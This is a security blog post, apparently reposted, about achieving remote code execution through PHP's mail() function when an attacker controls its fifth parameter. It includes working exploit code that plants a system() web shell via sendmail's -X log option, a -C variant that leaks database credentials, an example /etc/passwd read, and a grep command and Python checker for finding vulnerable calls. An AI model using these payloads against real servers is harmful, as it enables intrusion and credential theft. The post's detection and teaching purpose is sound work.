HACK80

Author: juk小乖
Exploit PHP’s mail() to get remote code execution

Posted by juk小乖 on 2017-10-12 16:16:23

Exploit PHP’s mail() function to perform remote code execution, under rare circumstances.

Security Sucks wrote about an interesting way to exploit PHP’s mail() function for remote code execution. Apparently, if you are able to control the 5th parameter of the mail() function ($options), you have the opportunity to execute arbitrary commands.
As with other PHP vulnerabilities, like bypassing PHP’s strcmp() function or phpinfo() type confusion, they are often only possible under rare circumstances.
Nevertheless, as always, it is very important to check your PHP code for this PHP mail() remote code execution vulnerability.
Verify and make sure your code is not vulnerable:
  grep -r -n --include "*.php" "mail(.*,.*,.*,.*,.*)" *
For this mail() remote code execution to work, a malicious user has to be able to control what goes into the 5th parameter, for example through improperly validated email forms.
Update 2016-09-07:
Apparently, the securitysucks.info domain no longer exists and the post is unavailable. I’ve copied the full text below for you, please note this was released on securitysucks.info on September 3, 2014 and it may be outdated.
A recent example exploiting this PHP mail() remote code execution vulnerability is a command execution via email in Roundcube 1.2.2, discovered by RIPS Technologies. Roundcube posted a patch to GitHub at the end of November, and issued version 1.2.3.

Exploit PHP’s mail() to get remote code execution

While searching around the web for new nifty tricks I stumbled across this post about how to get remote code execution exploiting PHP’s mail() function. First, I must say that this is only going to happen under some really rare circumstances. Nevertheless, it’s really something to think about and keep an eye out for. I will explain an example scenario which I think could be a real-life scenario later in this article. So, with that said, let’s have a look at what this is all about. When using PHP to send emails we can use PHP’s built-in function mail(). This function takes a total of five parameters:
  • To
  • Subject
  • Message
  • Headers (Optional)
  • Parameters (Optional)
This looks pretty innocent at first glance, but if this is used wrong it can be really bad. The parameter of interest is the 5th and last one, so let’s have a look at what the PHP manual has to say about it.
  The additional_parameters parameter can be used to pass additional flags as command line options to the program configured to be used when sending mail, as defined by the sendmail_path configuration setting. For example, this can be used to set the envelope sender address when using sendmail with the -f sendmail option.
This is really interesting. In short, it says that we can alter the behaviour of the sendmail application. Now, let’s have a look at the sendmail manual. I’m not going to post the entire manual here, but I will highlight some of the interesting parts.

Some interesting parameters

  -O option=value
      Set option option to the specified value. This form uses long names.

  -Cfile
      Use alternate configuration file. Sendmail gives up any enhanced (set-user-ID or set-group-ID) privileges if an alternate configuration file is specified.

  -X logfile
      Log all traffic in and out of mailers in the indicated log file. This should only be used as a last resort for debugging mailer bugs. It will log a lot of data very quickly.
Some interesting options

  QueueDirectory=queuedir
      Select the directory in which to queue messages.
So how can this be exploited?

Remote Code Execution

As stated above, this only occurs under very specific circumstances. For this to be exploitable, the user has to be able to control what goes into the 5th parameter, and it hardly makes sense that anyone would allow that. But it’s still something that really should be kept in mind by developers. With that said, let’s just dive into it!

This is the code for exploiting the mail() function:
  <?php
  $to = 'a@b.c';
  $subject = '<?php system($_GET["cmd"]); ?>';
  $message = '';
  $headers = '';
  $options = '-OQueueDirectory=/tmp -X/var/www/html/rce.php';
  mail($to, $subject, $message, $headers, $options);
Let’s inspect the logs from this. First, let’s have a look at what we can see in the browser by only going to the rce.php file:
  11226 <<< To: a@b.c
  11226 <<< Subject: 11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php
  11226 <<<
Nothing really scary to see in this log. Now, let’s use the cat command in the terminal on the same file:
  > cat rce.php
  11226 <<< To: a@b.c
  11226 <<< Subject:
  11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php
  11226 <<<
See anything a bit more interesting? Let’s try to execute some commands. I visit http://localhost/rce.php?cmd=ls%20-la and get the following output:
  11226 <<< To: a@b.c
  11226 <<< Subject: total 20
  drwxrwxrwx 2 *** *** 4096 Sep 3 01:25 .
  drwxr-xr-x 4 *** www-data 4096 Sep 2 23:53 ..
  -rw-r--r-- 1 *** *** 92 Sep 3 01:12 config.php
  -rwxrwxrwx 1 *** *** 206 Sep 3 01:25 mailexploit.php
  -rw-r--r-- 1 www-data www-data 176 Sep 3 01:27 rce.php
  11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php
  11226 <<<
  11226 <<<
  11226 <<<
  11226 <<< [EOF]
Now, let me break it down in case you don’t fully understand the code. The first four variables are pretty straightforward. We set the recipient email address to some bogus address, then in the subject we inject the PHP code that will execute our commands on the system, followed by an empty message and empty headers. The fifth variable is where the magic happens. The $options variable holds the string that lets us write our malicious code to the server and get remote code execution. First, we change the mail queue directory to /tmp using the -O argument with the QueueDirectory option. The reason we want it there is that this directory is globally writable. Second, the path and filename for the log is changed to /var/www/html/rce.php using the -X argument. Keep in mind that this path will not always be the same; you will have to craft it to fit the target’s file system.

If we now point our browser at http://example.com/rce.php it will display the log for the attempted delivery. But since we added the PHP code to the $subject variable, we can now append the query ?cmd=[some command here], for example http://example.com/rce.php?cmd=cat%20/etc/passwd. If you want, you could also create a Local/Remote File Inclusion vulnerability instead: just change system() to include(). This can be handy if wget is not available, or you’re not able to include a remote web shell. It’s also important to know that it’s not only the subject field that can be used to inject arbitrary code: the content of all the fields, except the fifth, is written to the log.
Read files on the server

Another way to exploit this is to directly read files on the server. This can be done by using the -C argument as shown above. I have made a dummy configuration file just to show how it works:
  <?php
  $to = 'a@b.c';
  $subject = '';
  $message = '';
  $headers = '';
  $options = '-C/var/www/html/config.php -OQueueDirectory=/tmp -X/var/www/html/evil.php';
  mail($to, $subject, $message, $headers, $options);
This creates a file named evil.php with the following content:
  11124 >>> /var/www/html/config.php: line 1: unknown configuration line "<?php"
  11124 >>> /var/www/html/config.php: line 3: unknown configuration line "dbuser = 'someuser';"
  11124 >>> /var/www/html/config.php: line 4: unknown configuration line "dbpass = 'somepass';"
  11124 >>> /var/www/html/config.php: line 5: unknown configuration line "dbhost = 'localhost';"
  11124 >>> /var/www/html/config.php: line 6: unknown configuration line "dbname = 'mydb';"
  11124 >>> No local mailer defined
Now we have managed to extract very sensitive data, and there's a lot of other things we can extract from the server.
A real-life scenario where this can become a reality

To be honest, I actually had to think about this for a while. I mean, who would be so stupid that they let their users control the sendmail parameters? Well, it really doesn’t have to be that stupid. So consider the following scenario. You have an admin panel for your website. Just like every other admin panel with respect for itself, it lets you set different settings for sending emails: stuff like port, SMTP, etc. But not only that, this administration panel actually lets you monitor your mail logs, and you can decide where to store the logs. Suddenly the idea of the values of the 5th parameter being controlled by an end user doesn’t sound that stupid anymore. You would of course not let this be modified from the contact form. But admins wouldn’t hack their own site, would they? So in combination with other attacks that result in unauthorized access, this can become a real threat, since you can actually create vulnerabilities that were not originally in the application.
How to detect a possible vulnerability

The fastest way to detect any possibility for this in code is to use Linux’s grep command and recursively look for any use of mail() with all 5 parameters in use. Position yourself in the root of whatever project you want to check and execute the following command. It will return all code lines that use mail() with five parameters.
  grep -r -n --include "*.php" "mail(.*,.*,.*,.*,.*)" *
There will probably be some false positives, so if you have any suggestions to improve this to make it even more accurate, please let me know!
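As an added example (not from the original post or its author), here is a tighter version of that check in Python: it parses every mail() call instead of pattern-matching commas, reports only calls that actually pass a 5th argument, and separates a non-literal argument (possibly attacker-controlled) from a literal one that already carries the -X, -C or -O flags described above. The PHP snippets it scans are constructed for the example.

```python
# Static check for PHP mail() calls whose 5th argument (additional_parameters) becomes sendmail
# flags. Added example, not from the original post; the PHP source scanned below is constructed.
import re

DANGEROUS_FLAGS = ("-X", "-C", "-O")   # per the article: -X/-O write files, -C reads one
VERDICT_TAINTED = "5th argument is not a string literal; may be attacker-controlled"
VERDICT_DANGEROUS = "literal 5th argument passes a sendmail flag that reads or writes files"
# Exactly one single- or double-quoted PHP string (backslash escapes allowed).
LITERAL = re.compile(r"'(?:[^'\\]|\\.)*'|\"(?:[^\"\\]|\\.)*\"", re.S)
# One token per PHP string literal, bracket, comma, or run of anything else.
TOKEN = re.compile(LITERAL.pattern + r"|[()\[\],]|[^'\"()\[\],]+", re.S)

def split_args(src, start):
    """Split a call's arguments from `start` (just past '('), honouring strings and nesting."""
    args, buf, depth = [], "", 0
    for tok in TOKEN.findall(src[start:]):
        if tok in ("(", "["):
            depth += 1
        elif tok in (")", "]"):
            if depth == 0:                 # closing paren of mail() itself
                break
            depth -= 1
        elif tok == "," and depth == 0:
            args.append(buf.strip())
            buf = ""
            continue
        buf += tok
    args.append(buf.strip())
    return args

def audit_mail_calls(php_source):
    """Return (line, verdict) for each mail() call whose 5th argument is tainted or dangerous."""
    findings = []
    for m in re.finditer(r"\bmail\s*\(", php_source):   # wrappers named mail() also match
        args = split_args(php_source, m.end())
        if len(args) < 5:
            continue                                     # no additional_parameters at all
        line = php_source.count("\n", 0, m.start()) + 1
        if not LITERAL.fullmatch(args[4]):
            findings.append((line, VERDICT_TAINTED))
        elif any(tok.startswith(DANGEROUS_FLAGS) for tok in args[4][1:-1].split()):
            findings.append((line, VERDICT_DANGEROUS))
    return findings

SAMPLE_PHP = r"""<?php
mail($to, $subject, $body, $headers, '-fbounces@example.com');  // constructed: harmless -f
mail($to, $subject, $body, $headers, '-OQueueDirectory=/tmp -X/var/www/html/rce.php');
mail($to, $subject, $body, $headers, $_POST['sendmail_opts']);  // constructed: user-controlled
"""
```

Run `audit_mail_calls(open(path).read())` over each file of a project; a wrapper function that happens to be named mail() will still show up, so review hits by hand.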
Summary

This is not something that you will stumble across often. To be honest, I don’t expect to ever see this in the wild at all, though it would be really cool to do so, but you never know, as explained in the "real-life scenario" section. Still, I do find this to be really interesting, and it makes you think "what other PHP functions can do this?" I hope you enjoyed the article and if you have any comments you know what to do.